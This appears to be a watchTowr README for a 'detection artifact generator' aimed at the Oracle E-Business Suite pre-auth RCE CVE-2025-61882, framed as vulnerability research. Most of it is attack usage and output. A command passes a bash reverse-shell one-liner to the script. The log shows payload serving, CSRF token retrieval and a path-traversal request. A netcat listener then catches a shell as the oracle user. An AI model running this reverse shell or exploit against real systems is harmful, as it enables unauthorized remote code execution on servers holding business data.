Detection Artifact Generator for Oracle E-Business Suite CVE-2025-61882
See our blog post for technical details
python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py
(*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator
- Sonny, Sina Kheirkhah (@SinSinology), Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-61882]
[*] Listening on 192.168.1.10:80 and serving payload...
[*] connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking smuggle stub...
192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -
Listener
ubuntu@watchTowr:~$ nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
[oracle@apps EBS_domain]$
This script attempts to detect if Oracle E-Business Suite is vulnerable to CVE-2025-61882
Oracle E-Business Suite, versions 12.2.3-12.2.14
For more information visit Oracle Security Alert Advisory - CVE-2025-61882
Follow watchTowr Labs
For the latest security research follow the watchTowr Labs Team